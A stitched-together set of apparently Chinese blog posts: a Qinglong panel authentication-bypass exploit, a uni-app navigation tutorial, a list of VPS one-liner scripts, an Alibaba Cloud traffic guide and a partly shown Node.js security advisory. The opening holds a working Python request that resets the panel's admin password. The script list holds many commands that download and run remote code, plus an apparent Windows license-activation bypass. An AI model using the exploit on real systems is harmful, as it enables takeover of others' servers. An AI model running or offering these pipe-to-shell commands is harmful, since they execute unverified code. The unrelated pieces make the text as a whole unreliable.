## 漏洞类型：未授权访问漏洞 / 权限绕过漏洞（可能导致远程代码执行 RCE）

**漏洞利用路径：**

攻击者通过暴露的 API 接口 /open/user/init 能够绕过认证，重新初始化系统用户。具体来说，可以通过 PUT 请求修改管理员账号和密码。

通过发送恶意请求（如修改用户名和密码），攻击者可以轻松获取对青龙面板的控制权限。


**使用 requests 库发送 PUT 请求：**

```python
import requests

url = 'http://10.0.233.143:5700/open/user/init'
data = {
    "username": "admin",
    "password": "pwnedbywebdxg",
}
r = requests.put(url, data=data)
print(r.text)
# 服务器响应：{"code":200,"message":"更新成功"}
```

**利用效果：**

请求成功后，管理员密码会被修改为 pwnedbywebdxg，攻击者能够以管理员身份访问青龙面板。

**漏洞影响：**

权限绕过：攻击者能够通过简单的请求修改用户密码，获得管理员权限。

远程代码执行 (RCE)：通过成功的权限提升，攻击者可以执行远程代码，进一步控制目标系统。

【高危】青龙面板漏洞

今天在使用uni-app开发微信小程序时，需要写一个横向导航栏，于是参考了京东微信小程序的样式，还原了它的效果，下面是简化后的代码。

这是一个可横向滚动的导航栏，选中某个导航项后，它会自动滚动到可视区域的第二个位置（即左侧保留一个前置项）。




**参考来源:** 京东微信小程序的横向导航设计
---
![image.png](https://abc1234.eu.org/cf3a0fe32bcc9dcdc9e0e91bf477f419.image.webp)
---

**实现效果** 

![image.png](https://abc1234.eu.org/d701c626bc8f45c64ed6750b06601c80.image.webp)

代码中 `systemInfoStore.menuButton.height ` 替换为导航栏的高度

```vue
<template>
  <view
    class="nav-wrapper"
    :style="{ height: systemInfoStore.menuButton.height + 'px' }"
  >
    
    <view class="nav-left">
      <scroll-view
        class="nav-scroll"
        scroll-x
        :scroll-left="scrollLeft"
        scroll-with-animation
      >
        <view
          class="nav-item"
          :class="{ active: currentIndex === index }"
          v-for="(item, index) in navList"
          :key="index"
          @click="changeTab(index)"
        >
          {{ item }}
        </view>
      </scroll-view>
    </view>

    
    <view class="nav-right" @click="handleMore">
        <span class="iconfont icon-zhankai"></span>
    </view>
  </view>
</template>

<script setup>
import { ref } from "vue";
import { SystemInfoStore } from "@/stores";

const systemInfoStore = SystemInfoStore();

const currentIndex = ref(0);
const scrollLeft = ref(0);

// 每个 tab 宽度（必须和 css 保持一致）
const itemWidth = 55;

const navList = ref([
  "推荐",
  "风景",
  "美女",
  "动漫",
  "科技",
  "游戏",
  "汽车",
  "生活",
  "体育",
  "推荐",
  "风景",
  "美女",
  "动漫",
  "科技",
  "游戏",
  "汽车",
  "生活",
  "体育",
  "推荐",
  "风景",
  "美女",
  "动漫",
  "科技",
  "游戏",
  "汽车",
  "生活",
  "体育",
]);

const changeTab = (index) => {
  currentIndex.value = index;

  // 当前项滑到第二个位置
  const targetIndex = index - 1 < 0 ? 0 : index - 1;
  scrollLeft.value = targetIndex * itemWidth;
};

const handleMore = () => {
  console.log("展开更多");
};
</script>

<style lang="scss" scoped>
.nav-wrapper {
  display: flex;
  align-items: center;
  width: 95%;
  margin: 0 auto;
}

.nav-left {
  flex: 1;
  overflow: hidden;
}

.nav-scroll {
  width: 100%;
  white-space: nowrap;
}

.nav-item {
  display: inline-block;
  width: 55px; /* 必须和 itemWidth 对应 */
  text-align: left;
  font-size: 15px;
  color: var(--text-primary);
}

/* 激活状态 */
.active {
  color: var(--primary-color);
  font-weight: bold;
}

.nav-right {
  width: 35px;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  background: var(---bg-secondary);
  border-left: 1px solid var(--bg-card);
  color: var(--text-primary);
  flex-shrink: 0; /* 防止被压缩 */
  position: relative;
}
.nav-right::before {
  content: "";
  position: absolute;
  left: 8px;
  top: 0;
  bottom: 0;
  width: 2px;
  background: linear-gradient(to right, rgba(0, 0, 0, 0.15), transparent);
}
</style>
```

uniapp开发微信小程序复刻京东横向导航

> 整理自 NodeSeek / 各位大佬脚本，适合 VPS 选购、重装、测试、优化、日常运维  
> ⚠️ 所有脚本请在 **全新系统 / 非生产环境** 下谨慎使用





## 一、DD重装脚本

### 1、“史上最强”脚本 **[脚本详情GitHub](https://github.com/bin456789/reinstall)**

```bash
wget --no-check-certificate -qO InstallNET.sh 'https://raw.githubusercontent.com/leitbogioro/Tools/master/Linux_reinstall/InstallNET.sh' && chmod a+x InstallNET.sh && bash InstallNET.sh -debian 12 -pwd 'password'
```

一键重装到 Linux，支持 19 种常见发行版<br>
一键重装到 Windows，使用官方原版 ISO 而非自制镜像，脚本支持自动查找 ISO 链接、自动安装 VirtIO 等公有云驱动<br>
支持任意方向重装`Linux to Linux`、`Linux to Windows`、`Windows to Windows`、`Windows to Linux`<br>

### 2、萌咖大佬的脚本

```bash
bash <(wget --no-check-certificate -qO- 'https://raw.githubusercontent.com/MoeClub/Note/master/InstallNET.sh') -d 11 -v 64 -p 密码 -port 端口 -a -firmware
```

### 3、beta.gs大佬的脚本

```bash
wget --no-check-certificate -O NewReinstall.sh https://raw.githubusercontent.com/fcurrk/reinstall/master/NewReinstall.sh && chmod a+x NewReinstall.sh && bash NewReinstall.sh
```

DD windows（使用史上最强DD脚本）
```bash
bash <(curl -sSL https://raw.githubusercontent.com/leitbogioro/Tools/master/Linux_reinstall/InstallNET.sh) -windows 10  -lang "cn"
```
账户：`Administrator`<br>
密码：`Teddysun.com`<br>

使用Windows徽标+R快捷键打开运行框，输入powershell运行，弹出powershell命名输入窗口，输入以下命令：
```powershell
irm https://get.activated.win | iex
```

## 二、综合测试脚本
### 1、bench.sh
```bash
wget -qO- bench.sh | bash
```

### 2、LemonBench
```bash
wget -qO- https://raw.githubusercontent.com/LemonBench/LemonBench/main/LemonBench.sh | bash -s -- --fast
```

### 3、融合怪
```bash
bash <(wget -qO- --no-check-certificate https://gitlab.com/spiritysdx/za/-/raw/main/ecs.sh)
```

### 4、NodeBench
```bash
bash <(curl -sL https://raw.githubusercontent.com/LloydAsp/NodeBench/main/NodeBench.sh)
```

## 三、性能测试
yabs
```bash
curl -sL yabs.sh | bash
```

跳过网络，测GB5
```bash
curl -sL yabs.sh | bash -s -- -i5
```

跳过网络和磁盘，测GB5
```bash
curl -sL yabs.sh | bash -s -- -if5
```

改测GB5不测GB6
```bash
curl -sL yabs.sh | bash -s -- -5
```

## 四、流媒体及IP质量测试
最常用版本
```bash
bash <(curl -L -s check.unlock.media)
```
原生检测脚本
```bash
bash <(curl -sL Media.Check.Place)
```
准确度最高
```bash
bash <(curl -L -s https://github.com/1-stream/RegionRestrictionCheck/raw/main/check.sh)
```
IP质量体检脚本
```bash
bash <(curl -sL IP.Check.Place)
```
一键修改解锁DNS
```bash
wget https://raw.githubusercontent.com/Jimmyzxk/DNS-Alice-Unlock/refs/heads/main/dns-unlock.sh && bash dns-unlock.sh
```

## 五、测速脚本
Speedtest
```bash
bash <(curl -sL bash.icu/speedtest)
```
Taier
```bash
bash <(curl -sL res.yserver.ink/taier.sh)
```
hyperspeed
```bash
bash <(curl -Lso- https://bench.im/hyperspeed)
```
全球测速
```bash
wget -qO- nws.sh | bash
```
区域速度测试
```bash
wget -qO- nws.sh | bash -s -- -r region_name
```
Ping 和路由测试
```bash
wget -qO- nws.sh | bash -s -- -rt [region]
```

## 六、回程测试
直接显示回程（小白用这个）
```bash
curl https://raw.githubusercontent.com/ludashi2020/backtrace/main/install.sh -sSf | sh
```

回程详细测试（推荐）
```bash
wget -N --no-check-certificate https://raw.githubusercontent.com/Chennhaoo/Shell_Bash/master/AutoTrace.sh && chmod +x AutoTrace.sh && bash AutoTrace.sh
```

```bash
wget https://ghproxy.com/https://raw.githubusercontent.com/vpsxb/testrace/main/testrace.sh -O testrace.sh && bash testrace.sh
```

## 七、功能脚本
添加SWAP
```bash
wget https://www.moerats.com/usr/shell/swap.sh && bash swap.sh
```
Fail2ban
```bash
wget --no-check-certificate https://raw.githubusercontent.com/FunctionClub/Fail2ban/master/fail2ban.sh && bash fail2ban.sh 2>&1 | tee fail2ban.log
```
一键开启BBR，适用于较新的Debian、Ubuntu
```bash
echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
sysctl -p
sysctl net.ipv4.tcp_available_congestion_control
lsmod | grep bbr
```
多功能BBR安装脚本
```bash
wget -N --no-check-certificate "https://gist.github.com/zeruns/a0ec603f20d1b86de6a774a8ba27588f/raw/4f9957ae23f5efb2bb7c57a198ae2cffebfb1c56/tcp.sh" && chmod +x tcp.sh && ./tcp.sh
```

锐速/BBRPLUS/BBR2/BBR3
```bash
wget -O tcpx.sh "https://github.com/ylx2016/Linux-NetSpeed/raw/master/tcpx.sh" && chmod +x tcpx.sh && ./tcpx.sh
```
TCP窗口调优
```bash
wget http://sh.nekoneko.cloud/tools.sh -O tools.sh && bash tools.sh
```
添加warp
```bash
wget -N https://gitlab.com/fscarmen/warp/-/raw/main/menu.sh && bash menu.sh [option] [lisence/url/token]
```
25端口开放测试
```bash
telnet smtp.aol.com 25
```

## 八、一键安装常用环境及软件

docker
```bash
bash <(curl -sL 'https://get.docker.com')
```

Python
```bash
curl -O https://raw.githubusercontent.com/lx969788249/lxspacepy/master/pyinstall.sh && chmod +x pyinstall.sh && ./pyinstall.sh
```


iperf3
```bash
apt install iperf3
```

realm
```bash
bash <(curl -L https://raw.githubusercontent.com/zhouh047/realm-oneclick-install/main/realm.sh) -i
```

gost
```bash
wget --no-check-certificate -O gost.sh https://raw.githubusercontent.com/qqrrooty/EZgost/main/gost.sh && chmod +x gost.sh && ./gost.sh
```


极光面板
```bash
bash <(curl -fsSL https://raw.githubusercontent.com/Aurora-Admin-Panel/deploy/main/install.sh)
```


哪吒监控
```bash
curl -L https://raw.githubusercontent.com/naiba/nezha/master/script/install.sh  -o nezha.sh && chmod +x nezha.sh && sudo ./nezha.sh
```

WARP
```bash
wget -N https://gitlab.com/fscarmen/warp/-/raw/main/menu.sh && bash menu.sh
```


Aria2
```bash
wget -N git.io/aria2.sh && chmod +x aria2.sh && ./aria2.sh
```


宝塔
```bash
wget -O install.sh http://v7.hostcli.com/install/install-ubuntu_6.0.sh && sudo bash install.sh
```


PVE虚拟化
```bash
bash <(wget -qO- --no-check-certificate https://raw.githubusercontent.com/oneclickvirt/pve/main/scripts/build_backend.sh)
```


Argox
```bash
bash <(wget -qO- https://raw.githubusercontent.com/fscarmen/argox/main/argox.sh)
```


## 九、综合功能脚本

科技lion
```bash
apt update -y  && apt install -y curl
bash <(curl -sL kejilion.sh)
```

SKY-BOX
```bash
wget -O box.sh https://raw.githubusercontent.com/BlueSkyXN/SKY-BOX/main/box.sh && chmod +x box.sh && clear && ./box.sh
```

## 十、杜甫检测脚本
```bash
curl -sL https://sick.onl | bash
```

```bash
wget https://github.com/Aniverse/A/raw/i/a && bash a
```

```bash
wget -qO- nws.sh | bash
```

```bash
# 下载脚本
wget --no-check-certificate -qO InstallNET.sh 'https://raw.githubusercontent.com/leitbogioro/Tools/master/Linux_reinstall/InstallNET.sh' && chmod a+x InstallNET.sh

#  开始 dd
bash InstallNET.sh -debian 12

# 杜甫指定raid dd
bash InstallNET.sh -debian 12 -raid "0"

# 杜甫指定网络 dd
bash InstallNET.sh -debian 12 --ip-addr 139.162.52.1 --ip-mask 24 --ip-gate 139.162.52.1 --ip6-addr 2a07:e040:2:1d3::1 --ip6-gate 2a07:e040::1 --ip6-mask 32

# 指定密码 dd
bash InstallNET.sh -debian 12 -pwd 'password'
```

```bash
curl -sL https://raw.githubusercontent.com/Yuri-NagaSaki/SICK/refs/heads/main/hardware_info.sh | bash -s -- -cn
```

vps(服务器)常用脚本

:::info{title="相关信息"}
转载文章来源 ： https://www.nodeseek.com/post-572284-1
:::
原理：阿里云香港最近表现不错，但新手轻量优惠不可选择香港，只能正价购买香港轻量，持有成本较高，所以我们可以利用阿里云（含阿里云国际版）每个账号免费赠送的 200 GB CDT（云数据传输）流量，配合配置最低的 ECS 实例，达到低成本搭乘阿里云香港网络快线的方法。

[CDT公网流量免费额度提升至220 GB/月](https://www.alibabacloud.com/help/zh/cdt/product-overview/cdt-public-network-traffic-free-quota-increased-from-200gb-month-to-220gb-month)

>产品：</br>
>CDT 公网流量</br>
免费额度与适用地域：</br>
免费额度为 220 GB/月，其中：</br>
>- 中国内地地域：20 GB/月
>- 非中国内地地域：200 GB/月</br>
>
>线路类型：</br>
>BGP（多线）



正文：

本文将介绍如何开启 CDT + 创建阿里云抢占式实例 + 保活，实现月付最低 4 元，享受 200G 单向出网高速流量的方法。

## 一、开通阿里云 CDT 功能

在控制台首页搜索框，直接输入“CDT”，自动弹出“控制台 > 云数据传输”选项，点击；或直接访问：https://cdt.console.aliyun.com/overview （阿里云国际站：https://cdt.console.alibabacloud.com/overview ），进入 CDT 工作台。

确认当前账户下的所有 CDT 子功能，如图示开通，如果还没有开通，选择未开通子项，点击“一键升级”：

![image.png](https://abc1234.eu.org/27d403b87b5190e351dab1b26112576a.image.webp)


## 二、开通阿里云 OSS 并上传 alpine 镜像
### 1、搜索栏搜索 oss 并开通：

![image.png](https://abc1234.eu.org/eaa3b0a6936dc6acd435de93028ea94a.image.webp)


![image.png](https://abc1234.eu.org/fbd85b0fcad1e871daf8459f50556396.image.webp)


![image.png](https://abc1234.eu.org/83feed28d947a8df159afdf0bd261ef3.image.webp)

### 2、上传镜像至 oss
#### ①点击管理控制台，创建 bucket，地域切记选择香港：

![image.png](https://abc1234.eu.org/32c3fe97bf118935b3923aa4dcb894e2.image.webp)

#### ②创建成功后，进入 bucket，上传所需 apline 镜像：

**下载apline镜像文件**: [点击下载](https://dl-cdn.alpinelinux.org/alpine/v3.23/releases/x86_64/alpine-virt-3.23.2-x86_64.iso)

![image.png](https://abc1234.eu.org/64432e742ce96eafd93138ca8e45e52f.image.webp)

点击上传文件，上传刚刚下载好的 alpine 镜像:

![image.png](https://abc1234.eu.org/f10c348c6f549585f03c4830b0d79409.image.webp)


![image.png](https://abc1234.eu.org/1002d9ad3d747ab4ab91036ac327aee7.image.webp)

#### ③保存上传好的镜像链接，下一步要用：

![image.png](https://abc1234.eu.org/1c63a62c7aac57eee7c83e3965d7186c.image.webp)

## 三、创建系统镜像
### 1、导入镜像：
点击 https://ecs.console.aliyun.com/image/region/cn-hongkong （阿里云国际站：https://ecs.console.alibabacloud.com/image/region/cn-hongkong ），导入刚刚上传到 oss 的 alpine 镜像：

![image.png](https://abc1234.eu.org/17eebf45b70b84673b79ec1d3ae88068.image.webp)

点击下一步：

![image.png](https://abc1234.eu.org/e418c00a4b12756798d4d9e41218b449.image.webp)

“镜像检测 → 导入后执行检测”最好不勾：

![image.png](https://abc1234.eu.org/666dd175b5f7410f66f2702c4688f480.image.webp)

“云盘配置 → 配置云盘属性”勾选，alpine virt ISO 镜像体积很小，虽然原文里给 1GB 空间启动足够，**但保险起见，还是建议给 2GB 以上，除非你执意只给 ECS 配置 1GB 的硬盘，但安装许多系统会受限制（系统本体、应用、日志等）**。后面创建机器时可选的硬盘容量，必须等于或大于导入镜像步骤设置的云盘容量。


![image.png](https://abc1234.eu.org/84662a6ad6cdc8a00cf6fa449c8b1c96.image.webp)

耐心等待创建完成：

![image.png](https://abc1234.eu.org/1ca88f797aa96f7820c1ca73fdfdaf3a.image.webp)

## 四、创建抢占式实例
在 https://ecs.console.aliyun.com/server/region/cn-hongkong#/ （阿里云国际站：https://ecs.console.alibabacloud.com/server/region/cn-hongkong#/ ）创建抢占式实例：

规格搜索：ecs.e-c4m1.large 选中该“经济型”：

![image.png](https://abc1234.eu.org/0757c978b5ea3ef34dadec7e630164a3.image.webp)

- 实例使用时长：无确定使用时长（否则按默认只设置 1 小时，1 小时后被删机）；
- 单台实例上限价格：使用自动出价，香港不同的区价格不一样，而且随资源变化随时浮动，图示价格仅供参考；
- 实例中断模式：节省停机（必须选这个，否则还是被删机）；
- 区域香港 B、C、D 区任意，首次创建时，会自动配置好对应地区的 VPC，不需要手动配置；
- 镜像选我们刚才创建的自定义的 alpine；
- 系统盘容量看自己选择，ESSD Entry 单 GB 价格便宜，但最低要配置 10 GB，极限容量下，价格比 ESSD 云盘贵，推荐 5 - 8 GB 的 ESSD 云盘或 10 GB 的 ESSD Entry 硬盘，1 - 2 GB 的那种玩法有点极限。

![image.png](https://abc1234.eu.org/10618f6ffee3d21e9fa09ea3fe20dbc1.image.webp)

先暂不分配 IPv4 地址，原因是该抢占式实例属于可被随时停机的那种，如果有大户开机，占据了某可用区（香港：B、C、D 区任意）的大量资源，这些抢占式实例被停机后，再次启动时，创建时自动分配的 IPv4 地址会被释放，所以我们需要使用 EIP 来使这台机器的 IPv4 地址固定；安全组、防火墙等自行做入网、出网设置，全开就行；如果对 IPv6 的使用没有强需求，建议不要为实例分配 IPv6 地址，阿里云对 IPv6 的支持仍然不是很好。


![image.png](https://abc1234.eu.org/3a1c9cdb330b2a392489234a83be27c9.image.webp)

确认配置无误，开氪：


![image.png](https://abc1234.eu.org/baccf5a87d7eeb22230621d71c15fdbb.image.webp)

## 五、创建 EIP（弹性公网 IP）
EIP 纯持有是持续扣费的，只要绑定到实例后，就不扣费了，**后期机器如果不要了删除，记得把闲置的 EIP 也删掉，否则会产生额外费用**。

### 1、进入 EIP 功能区：

访问：https://vpc.console.aliyun.com/eip/cn-hongkong/eips （阿里云国际：https://vpc.console.alibabacloud.com/eip/cn-hongkong/eips ）创建：


![image.png](https://abc1234.eu.org/5f351c166eec1e9a9cbf9d96167f00d2.image.webp)

### 2、确认配置，点击购买：
- 付费模式：按量付费；
- 地域和可用区：中国香港；
- 线路类型：BGP(多线)，BGP 多线精品不享受 200GB CDT 免费额度；
- 网络类型：公网；
- 安全防护：默认；
- 计费模式：按 CDT 计费；
- 带宽峰值：ecs.e-c4m1.large 的口子为 200 Mbps，拉满。


![image.png](https://abc1234.eu.org/aa5c828768acb38b1942392cb6a376c3.image.webp)


![image.png](https://abc1234.eu.org/cfb6b8cb82f15c28f4326f8a6937fd39.image.webp)

### 3、绑定实例：
访问：https://ecs.console.aliyun.com/server/region/cn-hongkong （阿里云国际：https://ecs.console.alibabacloud.com/server/region/cn-hongkong ），操作 → 三个点 → 绑定弹性公网 IP：


![image.png](https://abc1234.eu.org/bf6131a3f894ef51d0f4b757e03f02ed.image.webp)


![image.png](https://abc1234.eu.org/75d987b2ee5f47f99aa7c9f84372fa07.image.webp)

### 4、返回弹性公网 IP，创建加入共享带宽，可继续加大出网带宽量：


![image.png](https://abc1234.eu.org/7c9f4ce060652247beb7b129053ed0e8.image.webp)

计费方式：按主流量（入出取大）；</br>
计费模式：按 CDT 计费；</br>
带宽：根据需求自选，拉太大了会增加流量的消耗速度。</br>


![image.png](https://abc1234.eu.org/7e2023b7e1f0b97cbac30c2c9be0b488.image.webp)


![image.png](https://abc1234.eu.org/cfb6b8cb82f15c28f4326f8a6937fd39.image.webp)

在阿里云国际版做过测试，如果下单失败，显示：因安全问题，此次下单被终止，Request ID: 一串 UUID。需要访问：https://account.alibabacloud.com/kyc/index#/kyc 做 KYC 验证，它的审核特别严格，且阿里云国际版注册时，仅支持选择海外地区，根据接码手机号区号，确定账号主体注册区域，**如果没有当地合法的长期居留身份，这一步基本无法通过**，只能退而求其次，使用实例自带的 200 Mbps 的口子。


![image.png](https://abc1234.eu.org/96c3a7e48b35f682a4a1ddd922f7db71.image.webp)

现在就成为 2 Gbps 口子的服务器了。


## 六、安装系统
### 1、安装
首次需要登录 VNC，输入 root，密码为空，来到 Localhost#: 状态，输入
```bash
setup-alpine
```
进行首次安装，这个跟平时我们安装软件差不多的，一路回车，下一步下一步基本就可以了，其中有几步需要修改一下的，我在图片上标出来。

![image.png](https://abc1234.eu.org/4744f0c499e0d4aa1a2171e3fbc2dd36.image.webp)

这就配置好网络了，阿里云使用 DHCP，不需要手动配置网络。

![image.png](https://abc1234.eu.org/27ec7bd050d6f9ae77709ccda7585c7c.image.webp)

这样配置好用户名和密码及时区，代理跳过（**如果只按原文图示直接按“49”，有可能会连接到一个速度极慢的源，因为这个镜像列表是实时更新的，截止我做测试时，阿里云的镜像源序号是“49”，这个序号未来还会根据该列表的更新而随时变化，切勿刻舟求剑，需要先按“s show mirrorlist”显示镜像源列表，然后选择来自 https://mirrors.aliyun.com/alpine/ 的源**）。


![image.png](https://abc1234.eu.org/48129e6d4b7dbcc6b0becb11d10ad342.image.webp)

启用 root 用户，并使用密码方式验证登录。

### 2、配置磁盘、分区、格式化

![image.png](https://abc1234.eu.org/97c479bae459a7eb54538ac07730a0b2.image.webp)

这一步会提示 No disks available，Try boot media /media/vda ? 意思没有找到可用有磁盘，是否尝试安装到vda云盘上，改

`y`

安装完成后

`reboot`

重启，首次安装向导就完成了。

**重要提示：从自制镜像中读取到的 alpine virt iso 救援系统，在 VNC 执行 setup-alpine，将正式系统写入到硬盘后，该临时系统还运行在内存中，必须要重启！必须要重启！必须要重启！重启后进入到的 alpine 系统，才是从系统硬盘中读取的正式系统，才可以进行设置 DNS、配置源、清除硬盘标签、执行脚本重装等后续工作。**

### 3、修改 DNS
由于 alpine 系统还未联网，所以这一步还是需要在 VNC 中操作，如果不设置 DNS，只能 ping 通 IP 地址，无法 ping 通域名。

输入: `setup-dns`

![image.png](https://abc1234.eu.org/95a7b6dbefc6981d6feab9ff6c293162.image.webp)

DNS domain name:`nameserver`
DNS 地址随意，推荐：`1.1.1.1 8.8.8.8`

**当系统的网络连接功能完全正常后，便可使用 Xshell 等 ssh 工具进行远程连接。**

### 4、安装 curl，vim
先更新一下软件源：`apk update`</br>
安装组件：`apk add curl vim`

其它应用也是类似。

### 5、添加额外源（可选）
仓库配置路径：`/etc/apk/repositories`</br>
打开仓库配置文件：`vim /etc/apk/repositories`</br>

将社区源开头注释去掉：
```
http://mirrors.aliyun.com/alpine/v3.23/main    # 默认配置，主要的源
http://mirrors.aliyun.com/alpine/v3.23/community   # 社区源，默认未开启，去掉前面#号
```

添加 edge 源，拥有很多第三方应用，旧版 alpine 配置 edge 源，安装软件时，会产生很多依赖问题，不推荐：
```
http://mirrors.aliyun.com/alpine/edge/community
http://mirrors.aliyun.com/alpine/edge/testing
```

将仓库配置文件保存后，再次更新源：`apk update`

已经开好了，剩下的玩法大伙自己发掘吧，现在可以把 oss 与镜像删除了，防止额外扣费。


![image.png](https://abc1234.eu.org/453fc4e679a720a337b032b9aeda542b.image.webp)


![image.png](https://abc1234.eu.org/743052fad0130b47a0690f93340adc19.image.webp)


![image.png](https://abc1234.eu.org/3f45e0224bf8220cac72c6b933348a94.image.webp)

## 七、保活服务器
需要使用阿里云 sdk。

### 1、先创建一个用户并赋予权限
访问：https://ram.console.aliyun.com/users （阿里云国际版：https://ram.console.alibabacloud.com/users）


![image.png](https://abc1234.eu.org/57bafcdd5d3f6edd3826f330cffb598f.image.webp)

记得保存 AccessKey ID、AccessKey Secret，后面需要用到。

### 2、为刚创建的用户增加授权


![image.png](https://abc1234.eu.org/265551c871df68d71637b60964e1be5a.image.webp)

新建修改下列脚本，安装必要依赖，设定每分钟执行。切记在另外的机器上设置，不要在阿里云抢占式实例自己上运行。使用 crontab 设置为每分钟执行一次。

```
# -*- coding: utf-8 -*-
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.request import CommonRequest
from aliyunsdkecs.request.v20140526 import StartInstancesRequest, StopInstancesRequest, DescribeInstancesRequest
import json
import sys
import logging
# pip install aliyun-python-sdk-core aliyun-python-sdk-ecs


# ================== 1. 配置日志 ==================
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s - %(levelname)s - %(message)s",
    stream=sys.stdout
)
logger = logging.getLogger(__name__)

# ================== 2. 配置阿里云凭证和ECS实例信息 ==================
ACCESS_KEY_ID = 'LTAIxxxxxxx'      # 您的AccessKey ID
ACCESS_KEY_SECRET = 'xxxxxxxxxx'   # 您的AccessKey Secret
REGION_ID = 'cn-hongkong'          # 区域ID
ECS_INSTANCE_ID = 'i-xxxxxxxxx'    # 您要控制的ECS实例ID

# 流量阈值 (GB)
TRAFFIC_THRESHOLD_GB = 180

# ================== 3. 初始化客户端 ==================
try:
    client = AcsClient(ACCESS_KEY_ID, ACCESS_KEY_SECRET, REGION_ID)
    logger.info("AcsClient initialized successfully.")
except Exception as e:
    logger.error(f"Failed to initialize AcsClient: {e}")
    sys.exit(1)

# ================== 4. 查询当前总流量 ==================
def get_total_traffic_gb(client):
    request = CommonRequest()
    request.set_domain('cdt.aliyuncs.com')
    request.set_version('2021-08-13')
    request.set_action_name('ListCdtInternetTraffic')
    request.set_method('POST')

    try:
        response = client.do_action_with_exception(request)
        response_json = json.loads(response.decode('utf-8'))

        total_bytes = sum(d.get('Traffic', 0) for d in response_json.get('TrafficDetails', []))
        total_gb = total_bytes / (1024 ** 3)

        logger.info(f"当前总互联网流量: {total_gb:.2f} GB")
        return total_gb
    except Exception as e:
        logger.error(f"获取CDT流量失败: {e}")
        sys.exit(1)

# ================== 5. 查询ECS实例状态 ==================
def get_ecs_status(client, instance_id):
    try:
        request = DescribeInstancesRequest.DescribeInstancesRequest()
        request.set_InstanceIds([instance_id])
        response = client.do_action_with_exception(request)
        response_json = json.loads(response.decode('utf-8'))

        instances = response_json.get("Instances", {}).get("Instance", [])
        if not instances:
            logger.error("未找到该ECS实例信息。")
            return None

        status = instances[0].get("Status")
        logger.info(f"ECS实例 {instance_id} 当前状态: {status}")
        return status
    except Exception as e:
        logger.error(f"获取ECS实例状态失败: {e}")
        return None

# ================== 6. 启动ECS实例 ==================
def ecs_start(client, instance_id):
    status = get_ecs_status(client, instance_id)
    if status == "Running":
        logger.info(f"ECS实例 {instance_id} 已经是运行状态，无需启动。")
        return

    try:
        request = StartInstancesRequest.StartInstancesRequest()
        request.set_InstanceIds([instance_id])
        request.set_accept_format('json')

        response = client.do_action_with_exception(request)
        logger.info(f"ECS启动响应: {response.decode('utf-8')}")
    except Exception as e:
        logger.error(f"启动ECS实例失败: {e}")

# ================== 7. 停止ECS实例 ==================
def ecs_stop(client, instance_id):
    status = get_ecs_status(client, instance_id)
    if status == "Stopped":
        logger.info(f"ECS实例 {instance_id} 已经是停止状态，无需再次停止。")
        return

    try:
        request = StopInstancesRequest.StopInstancesRequest()
        request.set_InstanceIds([instance_id])
        request.set_ForceStop(False)
        request.set_accept_format('json')

        response = client.do_action_with_exception(request)
        logger.info(f"ECS停止响应: {response.decode('utf-8')}")
    except Exception as e:
        logger.error(f"停止ECS实例失败: {e}")

# ================== 8. 主流程 ==================
def main():
    total_gb = get_total_traffic_gb(client)

    if total_gb < TRAFFIC_THRESHOLD_GB:
        logger.info(f"流量 {total_gb:.2f} GB < 阈值 {TRAFFIC_THRESHOLD_GB} GB，尝试启动 ECS")
        ecs_start(client, ECS_INSTANCE_ID)
    else:
        logger.info(f"流量 {total_gb:.2f} GB ≥ 阈值 {TRAFFIC_THRESHOLD_GB} GB，尝试停止 ECS")
        ecs_stop(client, ECS_INSTANCE_ID)

    logger.info("脚本执行完毕。")

if __name__ == "__main__":
    main()
```

使用阿里云CDT 享受每月200G/4元高速流量

## 安全更新已发布
现在已推出针对 Node.js 25.x、24.x、22.x 和 20.x 版本系列的更新，以解决以下问题：

- 3 个高危问题。
- 4 个中等严重程度的问题。
- 1 个低严重性问题。

**本次安全更新包含以下依赖项更新，以解决公开存在的漏洞：**

- c-ares (1.34.6) 在 20.x、22.x、24.x、25.x 上
- undici (6.23.0, 7.18.0) 于 20.x, 22.x, 24.x, 25.x




## 基于超时的竞争条件导致 Uint8Array/Buffer.alloc 无法填充零值 (CVE-2025-55131) - (高危)

Node.js 的缓冲区分配逻辑存在缺陷，当使用vm带有超时选项的模块时，如果分配操作被中断，则可能暴露未初始化的内存。在特定的时间条件下，使用 `buffer.setBuffers`Buffer.alloc或其他TypedArray类似方法分配的缓冲区Uint8Array可能包含先前操作遗留的数据，从而导致进程内密钥（例如令牌或密码）泄露或数据损坏。

虽然漏洞利用通常需要精确的时间控制或进程内代码执行，但当不受信任的输入影响工作负载和超时时，它也可能变得可远程利用，从而导致潜在的机密性和完整性影响。

**影响：**

- 此漏洞影响所有活跃版本系列的用户：20.x、22.x、24.x、25.x


感谢 Nikita Skovoroda 报告并修复此漏洞。

## 利用精心构造的符号链接绕过文件系统权限 (CVE-2025-55130) - (高危)

Node.js 权限模型的一个缺陷允许攻击者利用精心构造的相对符号链接路径绕过--allow-fs-read权限--allow-fs-write 限制。通过链接目录和符号链接，即使脚本仅被授予当前目录的访问权限，也能绕过允许的路径并读取敏感文件。这破坏了预期的隔离保证，使用户能够任意读写文件，从而可能导致系统被入侵。

**影响：**

- 此漏洞会影响 Node.js v20、v22、v24 和 v25 中采用权限模型的用户。

感谢 natann 报告此漏洞，也感谢 RafaelGSS 修复了它。

## Node.js HTTP/2 服务器在接收到格式错误的 HEADERS 帧时崩溃并出现未处理的错误 (CVE-2025-59465) - (高危)

**`HTTP/2 HEADERS`** 包含过大或无效数据的格式错误帧 **`HPACK`** 会导致 Node.js 崩溃，因为它会触发未处理的 **`TLSSocket错误`** **`ECONNRESET`**。进程不会安全地关闭连接，而是直接崩溃，从而导致远程拒绝服务攻击。这主要影响那些没有为安全套接字附加显式错误处理程序的应用程序，例如：


```js
server.on('secureConnection', socket => {
  socket.on('error', err => {
    console.log(err);
  });
});
```

**影响：**

- 此漏洞影响所有活跃版本系列的用户：20.x、22.x、24.x、25.x

感谢 dantt 报告此漏洞，也感谢 RafaelGSS 修复了它。

## Node.js 中通过 async_hooks 捕获的“超出最大调用堆栈大小”错误会导致进程崩溃，绕过错误处理程序 (CVE-2025-59466) - (中等)
